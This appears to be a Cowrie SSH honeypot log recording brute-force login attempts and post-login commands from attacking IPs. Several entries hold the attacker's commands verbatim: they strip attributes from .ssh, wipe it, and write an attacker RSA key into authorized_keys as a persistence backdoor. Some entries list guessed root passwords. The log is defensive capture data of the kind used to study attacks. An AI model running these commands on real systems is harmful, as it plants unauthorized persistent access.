{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:33:08.553836Z","src_ip":"212.227.125.160","session":"5808018b72fc"}
{"eventid":"cowrie.login.failed","username":"user","password":"satan","message":"login attempt [user/satan] failed","sensor":"my-vps","timestamp":"2025-08-28T10:33:09.518924Z","src_ip":"212.227.125.160","session":"5808018b72fc"}
{"eventid":"cowrie.login.failed","username":"user","password":"hudson","message":"login attempt [user/hudson] failed","sensor":"my-vps","timestamp":"2025-08-28T10:33:10.642929Z","src_ip":"212.227.125.160","session":"5808018b72fc"}
{"eventid":"cowrie.login.failed","username":"user","password":"commando","message":"login attempt [user/commando] failed","sensor":"my-vps","timestamp":"2025-08-28T10:33:11.761771Z","src_ip":"212.227.125.160","session":"5808018b72fc"}
{"eventid":"cowrie.login.failed","username":"user","password":"bones","message":"login attempt [user/bones] failed","sensor":"my-vps","timestamp":"2025-08-28T10:33:12.879243Z","src_ip":"212.227.125.160","session":"5808018b72fc"}
{"eventid":"cowrie.login.failed","username":"user","password":"bangkok","message":"login attempt [user/bangkok] failed","sensor":"my-vps","timestamp":"2025-08-28T10:33:14.007261Z","src_ip":"212.227.125.160","session":"5808018b72fc"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:33:15.127782Z","src_ip":"212.227.125.160","session":"5808018b72fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47306,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8627a2638f7","protocol":"ssh","message":"New connection: 212.227.235.229:47306 (1.2.3.4:22) [session: b8627a2638f7]","sensor":"my-vps","timestamp":"2025-08-28T10:33:32.382248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:33:32.383932Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:33:32.683344Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.login.success","username":"root","password":"ZM123456.","message":"login attempt [root/ZM123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:33:33.923292Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:33:34.536755Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:33:34.537426Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:33:34.538494Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:33:34.838685Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:33:35.492728Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T10:33:35.493419Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T10:33:35.794937Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:33:35.795808Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47314,"dst_ip":"1.2.3.4","dst_port":22,"session":"aff82c4646ed","protocol":"ssh","message":"New connection: 212.227.235.229:47314 (1.2.3.4:22) [session: aff82c4646ed]","sensor":"my-vps","timestamp":"2025-08-28T10:33:36.096973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:33:36.098124Z","src_ip":"212.227.235.229","session":"aff82c4646ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:33:36.400659Z","src_ip":"212.227.235.229","session":"aff82c4646ed"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T10:33:37.654151Z","src_ip":"212.227.235.229","session":"aff82c4646ed"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:33:38.960764Z","src_ip":"212.227.235.229","session":"aff82c4646ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60016,"dst_ip":"1.2.3.4","dst_port":22,"session":"1030e7a4ee4a","protocol":"ssh","message":"New connection: 212.227.235.229:60016 (1.2.3.4:22) [session: 1030e7a4ee4a]","sensor":"my-vps","timestamp":"2025-08-28T10:33:39.263892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:33:39.264698Z","src_ip":"212.227.235.229","session":"1030e7a4ee4a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:33:39.568618Z","src_ip":"212.227.235.229","session":"1030e7a4ee4a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:33:40.826714Z","src_ip":"212.227.235.229","session":"1030e7a4ee4a"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:33:41.132076Z","src_ip":"212.227.235.229","session":"b8627a2638f7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:33:41.132800Z","src_ip":"212.227.235.229","session":"1030e7a4ee4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57844,"dst_ip":"1.2.3.4","dst_port":22,"session":"7119d6cef3d0","protocol":"ssh","message":"New connection: 212.227.235.229:57844 (1.2.3.4:22) [session: 7119d6cef3d0]","sensor":"my-vps","timestamp":"2025-08-28T10:34:44.910004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:34:44.912852Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:34:45.079172Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:34:45.380736Z","src_ip":"116.198.207.211","session":"71568e617340"}
{"eventid":"cowrie.login.success","username":"root","password":"Windows@2008","message":"login attempt [root/Windows@2008] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:34:45.755033Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:34:46.494060Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:34:46.494788Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:34:46.496040Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:34:46.665735Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:34:47.021139Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T10:34:47.021826Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T10:34:47.191628Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:34:47.192509Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57856,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b083fb29e94","protocol":"ssh","message":"New connection: 212.227.235.229:57856 (1.2.3.4:22) [session: 8b083fb29e94]","sensor":"my-vps","timestamp":"2025-08-28T10:34:47.385011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:34:47.385927Z","src_ip":"212.227.235.229","session":"8b083fb29e94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:34:47.566437Z","src_ip":"212.227.235.229","session":"8b083fb29e94"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T10:34:48.304124Z","src_ip":"212.227.235.229","session":"8b083fb29e94"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:34:49.484647Z","src_ip":"212.227.235.229","session":"8b083fb29e94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57858,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf6044b59a7c","protocol":"ssh","message":"New connection: 212.227.235.229:57858 (1.2.3.4:22) [session: bf6044b59a7c]","sensor":"my-vps","timestamp":"2025-08-28T10:34:49.652318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:34:49.653136Z","src_ip":"212.227.235.229","session":"bf6044b59a7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:34:49.821603Z","src_ip":"212.227.235.229","session":"bf6044b59a7c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:34:50.543229Z","src_ip":"212.227.235.229","session":"bf6044b59a7c"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:34:50.715549Z","src_ip":"212.227.235.229","session":"7119d6cef3d0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:34:50.716653Z","src_ip":"212.227.235.229","session":"bf6044b59a7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35438,"dst_ip":"1.2.3.4","dst_port":22,"session":"6328efb12ca4","protocol":"ssh","message":"New connection: 212.227.235.229:35438 (1.2.3.4:22) [session: 6328efb12ca4]","sensor":"my-vps","timestamp":"2025-08-28T10:35:03.478118Z"}
